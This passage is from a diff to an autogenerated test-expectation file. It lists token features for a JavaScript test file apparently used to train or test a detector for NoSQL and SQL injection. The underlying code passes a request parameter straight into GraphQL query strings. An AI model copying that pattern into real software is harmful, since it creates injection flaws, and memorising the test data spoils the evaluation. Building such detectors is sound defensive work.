autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:31:27:34 | foo | stringConcatenatedWith | -endpoint- id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:37:27:38 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:37:27:38 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:37:27:38 | id | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:37:27:38 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:37:27:38 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:37:27:38 | id | stringConcatenatedWith | 'foo ' -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:11:29:19 | myGraphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:11:29:19 | myGraphql | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:11:29:19 | myGraphql | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:11:29:19 | myGraphql | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:11:29:19 | myGraphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:11:29:48 | myGraph ... equest) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:11:29:48 | myGraph ... equest) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:11:29:48 | myGraph ... equest) | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:11:29:48 | myGraph ... equest) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:11:29:48 | myGraph ... equest) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:11:29:48 | myGraphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:11:29:48 | myGraphql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:11:29:48 | myGraphql | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:11:29:48 | myGraphql | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:11:29:48 | myGraphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:23:29:39 | withCustomRequest | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:23:29:39 | withCustomRequest | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:23:29:39 | withCustomRequest | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:23:29:39 | withCustomRequest | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:23:29:39 | withCustomRequest | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:23:29:48 | exceptional return of withCus ... equest) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:23:29:48 | exceptional return of withCus ... equest) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:23:29:48 | exceptional return of withCus ... equest) | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:23:29:48 | exceptional return of withCus ... equest) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:23:29:48 | exceptional return of withCus ... equest) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:23:29:48 | withCus ... equest) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:23:29:48 | withCus ... equest) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:23:29:48 | withCus ... equest) | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:23:29:48 | withCus ... equest) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:23:29:48 | withCus ... equest) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:41:29:47 | request | CalleeFlexibleAccessPath | withCustomRequest | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:41:29:47 | request | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:41:29:47 | request | calleeImports | @octokit/graphql | @@ -215,6 +1585,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:41:29:47 | request | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:41:29:47 | request | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:29:41:29:47 | request | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:11:30:18 | response | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:11:30:18 | response | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:11:30:18 | response | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:11:30:18 | response | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:11:30:18 | response | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:11:30:43 | respons ... ${id}`) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:11:30:43 | respons ... ${id}`) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:11:30:43 | respons ... ${id}`) | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:11:30:43 | respons ... ${id}`) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:11:30:43 | respons ... ${id}`) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:22:30:30 | myGraphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:22:30:30 | myGraphql | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:22:30:30 | myGraphql | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:22:30:30 | myGraphql | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:22:30:30 | myGraphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:22:30:43 | exceptional return of myGraph ... ${id}`) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:22:30:43 | exceptional return of myGraph ... ${id}`) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:22:30:43 | exceptional return of myGraph ... ${id}`) | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:22:30:43 | exceptional return of myGraph ... ${id}`) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:22:30:43 | exceptional return of myGraph ... ${id}`) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:22:30:43 | myGraph ... ${id}`) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:22:30:43 | myGraph ... ${id}`) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:22:30:43 | myGraph ... ${id}`) | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:22:30:43 | myGraph ... ${id}`) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:22:30:43 | myGraph ... ${id}`) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:32:30:42 | `foo ${id}` | CalleeFlexibleAccessPath | myGraphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:32:30:42 | `foo ${id}` | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:32:30:42 | `foo ${id}` | calleeImports | @octokit/graphql | @@ -223,6 +1618,58 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:32:30:42 | `foo ${id}` | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:32:30:42 | `foo ${id}` | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:32:30:42 | `foo ${id}` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:33:30:36 | foo | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:33:30:36 | foo | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:33:30:36 | foo | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:33:30:36 | foo | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:33:30:36 | foo | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:33:30:36 | foo | stringConcatenatedWith | -endpoint- id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:39:30:40 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:39:30:40 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:39:30:40 | id | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:39:30:40 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:39:30:40 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:30:39:30:40 | id | stringConcatenatedWith | 'foo ' -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:11:32:22 | withDefaults | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:11:32:22 | withDefaults | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:11:32:22 | withDefaults | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:11:32:22 | withDefaults | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:11:32:22 | withDefaults | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:11:32:45 | withDef ... lts({}) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:11:32:45 | withDef ... lts({}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:11:32:45 | withDef ... lts({}) | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:11:32:45 | withDef ... lts({}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:11:32:45 | withDef ... lts({}) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:11:32:45 | withDefaults | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:11:32:45 | withDefaults | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:11:32:45 | withDefaults | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:11:32:45 | withDefaults | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:11:32:45 | withDefaults | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:26:32:32 | graphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:26:32:32 | graphql | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:26:32:32 | graphql | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:26:32:32 | graphql | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:26:32:32 | graphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:26:32:41 | graphql.defaults | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:26:32:41 | graphql.defaults | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:26:32:41 | graphql.defaults | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:26:32:41 | graphql.defaults | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:26:32:41 | graphql.defaults | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:26:32:45 | exceptional return of graphql.defaults({}) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:26:32:45 | exceptional return of graphql.defaults({}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:26:32:45 | exceptional return of graphql.defaults({}) | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:26:32:45 | exceptional return of graphql.defaults({}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:26:32:45 | exceptional return of graphql.defaults({}) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:26:32:45 | graphql.defaults({}) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:26:32:45 | graphql.defaults({}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:26:32:45 | graphql.defaults({}) | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:26:32:45 | graphql.defaults({}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:26:32:45 | graphql.defaults({}) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:34:32:41 | defaults | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:34:32:41 | defaults | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:34:32:41 | defaults | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:34:32:41 | defaults | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:34:32:41 | defaults | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:43:32:44 | {} | CalleeFlexibleAccessPath | graphql.defaults | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:43:32:44 | {} | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:43:32:44 | {} | calleeImports | @octokit/graphql | @@ -232,6 +1679,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:43:32:44 | {} | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:43:32:44 | {} | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:32:43:32:44 | {} | receiverName | graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:5:33:16 | withDefaults | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:5:33:16 | withDefaults | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:5:33:16 | withDefaults | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:5:33:16 | withDefaults | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:5:33:16 | withDefaults | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:5:33:29 | exceptional return of withDef ... ${id}`) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:5:33:29 | exceptional return of withDef ... ${id}`) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:5:33:29 | exceptional return of withDef ... ${id}`) | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:5:33:29 | exceptional return of withDef ... ${id}`) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:5:33:29 | exceptional return of withDef ... ${id}`) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:5:33:29 | withDef ... ${id}`) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:5:33:29 | withDef ... ${id}`) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:5:33:29 | withDef ... ${id}`) | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:5:33:29 | withDef ... ${id}`) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:5:33:29 | withDef ... ${id}`) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:18:33:28 | `foo ${id}` | CalleeFlexibleAccessPath | withDefaults | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:18:33:28 | `foo ${id}` | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:18:33:28 | `foo ${id}` | calleeImports | @octokit/graphql | @@ -240,12 +1702,70 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:18:33:28 | `foo ${id}` | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:18:33:28 | `foo ${id}` | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:18:33:28 | `foo ${id}` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:19:33:22 | foo | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:19:33:22 | foo | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:19:33:22 | foo | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:19:33:22 | foo | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:19:33:22 | foo | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:19:33:22 | foo | stringConcatenatedWith | -endpoint- id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:25:33:26 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:25:33:26 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:25:33:26 | id | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:25:33:26 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:25:33:26 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:33:25:33:26 | id | stringConcatenatedWith | 'foo ' -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:7:36:17 | { request } | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:7:36:17 | { request } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:7:36:17 | { request } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:7:36:47 | request | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:7:36:47 | request | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:7:36:47 | request | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:7:36:47 | { reque ... quest") | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:7:36:47 | { reque ... quest") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:7:36:47 | { reque ... quest") | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:9:36:15 | request | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:9:36:15 | request | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:9:36:15 | request | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:9:36:15 | request | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:9:36:15 | request | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:9:36:15 | request | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:9:36:15 | request | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:9:36:15 | request | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:9:36:15 | request | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:9:36:15 | request | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:9:36:15 | request | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:9:36:15 | request | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:9:36:15 | request | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:21:36:27 | require | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:21:36:27 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:21:36:27 | require | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:21:36:47 | exceptional return of require ... quest") | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:21:36:47 | exceptional return of require ... quest") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:21:36:47 | 